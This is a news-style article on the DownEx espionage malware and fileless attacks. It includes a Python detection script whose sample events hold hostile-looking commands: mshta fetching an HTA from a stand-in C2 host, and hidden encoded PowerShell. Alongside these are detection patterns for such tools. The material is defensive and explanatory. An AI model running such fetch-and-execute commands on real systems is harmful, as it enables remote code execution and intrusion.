DownEx Malware Used in Espionage Campaign
A new type of malware called DownEx has been discovered by Romanian cybersecurity researchers.
It is being used in a sophisticated espionage campaign that is targeting government organizations in Central Asia, with evidence suggesting the involvement of Russia-based threat actors. The attacks are carried out through spear-phishing emails containing a booby-trapped payload, which is disguised as a Microsoft Word file.
Once the attachment is opened, a decoy document is displayed while a malicious HTML application runs in the background. This HTA file is designed to establish contact with a remote command-and-control server to retrieve a next-stage payload, which is believed to be a backdoor for establishing persistence. The attackers also use custom tools for post-exploitation activities, including C/C++-based binaries to enumerate network resources, a Python script to receive instructions to steal files, delete other malware, and capture screenshots, and a C++-based malware called DownEx to exfiltrate files to the C2 server.
Two other variants of DownEx have also been discovered. Researchers further noted that this is a fileless attack, which means the malicious script only exists in memory and never makes it onto the victim's drives.
What is Fileless Malware and What Makes it Particularly Dangerous?
Fileless malware is a type of malicious software that operates in a computer's memory, without leaving any traces on the hard drive. This makes it particularly difficult to detect and remove using traditional antivirus software because there are no files to scan. Instead of relying on a file or executable, fileless malware is often delivered through techniques such as social engineering, exploits, or malicious macros in documents.
One of the key characteristics of fileless malware is that it uses legitimate programs or tools already present on the system, such as PowerShell or Windows Management Instrumentation (WMI), to carry out its malicious activities. By doing this, fileless malware can blend in with legitimate system activity and evade detection by traditional antivirus software.
Another reason fileless malware is particularly dangerous is that it can often bypass security controls such as firewalls, intrusion detection and prevention systems (IDS/IPS), and endpoint protection tools that rely on file-based signatures or pattern matching. Additionally, because it writes nothing to disk, it can remain undetected for longer periods of time and has a greater chance of achieving its objectives before being discovered.
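Because a fileless chain like the one described above (a Word attachment that launches an HTA host, which pulls a next stage from a C2 server) leaves no file for a signature scanner, defenders lean on process telemetry instead: who spawned what, and with which command line. The script below is an added example written for this article, not code from the article or from the researchers it cites. It assumes process-creation events with Sysmon-style field names (ParentImage, Image, CommandLine); the events themselves are constructed for illustration, and the hostname and base64 string in them are placeholders. It flags three patterns that are hard for this class of malware to avoid: an Office application spawning a script host, mshta.exe being handed a remote URL, and PowerShell started with an encoded or hidden-window command.

```python
"""Process-lineage detection for fileless, living-off-the-land activity.

Added example; not part of the original article. Field names follow the
Sysmon process-creation (Event ID 1) convention as an assumption. The sample
events at the bottom are constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass

# Office binaries that normally have no business launching interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Built-in hosts commonly abused to run code without dropping a file.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "wmic.exe"}

# powershell.exe accepts unambiguous prefixes of -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
REMOTE_URL = re.compile(r"(?i)\bhttps?://")


@dataclass
class Alert:
    rule: str
    image: str
    parent: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the alerts raised by a single process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    alerts = []

    # Lineage: a document viewer spawning an interpreter is the classic
    # macro/HTA pivot, regardless of what the child goes on to do.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        alerts.append(Alert("office_spawns_script_host", image, parent, cmd))

    # mshta.exe fetching its HTA from the network is the stage-two pattern
    # the article describes: nothing is ever written to disk.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        alerts.append(Alert("mshta_remote_url", image, parent, cmd))

    # Encoded or hidden PowerShell is the most common in-memory loader shape.
    if image in {"powershell.exe", "pwsh.exe"}:
        if ENCODED_FLAG.search(cmd):
            alerts.append(Alert("powershell_encoded_command", image, parent, cmd))
        if HIDDEN_FLAG.search(cmd):
            alerts.append(Alert("powershell_hidden_window", image, parent, cmd))

    return alerts


def scan(events: list) -> list:
    """Evaluate a batch of events and return every alert in order."""
    return [alert for event in events for alert in evaluate(event)]


# Constructed sample telemetry (placeholder host and base64 payload).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://c2.example.invalid/stage.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoP -W Hidden -enc QUJDRA=="},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.parent} -> {alert.image}: {alert.command_line}")
```

The rules key on lineage and command-line shape rather than on hashes, which is the point: the HTA and the PowerShell payload can change on every delivery, but the Word-to-mshta parent/child relationship and the encoded-command switch are structural to the technique. In production these checks would sit on top of a telemetry source (Sysmon, EDR, or Windows 4688 with command-line auditing enabled) rather than on a hard-coded list, and the benign third and fourth events show why the lineage rule should stay narrow: Office legitimately spawns helpers like the print spooler proxy, and plain PowerShell runs from Explorer all day.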
Fileless malware is often used in targeted attacks, such as those against financial institutions or other high-value targets, where the goal is to gain access to sensitive information or systems. It can also be used for more widespread attacks, such as ransomware campaigns, where the attackers are looking to infect as many systems as possible.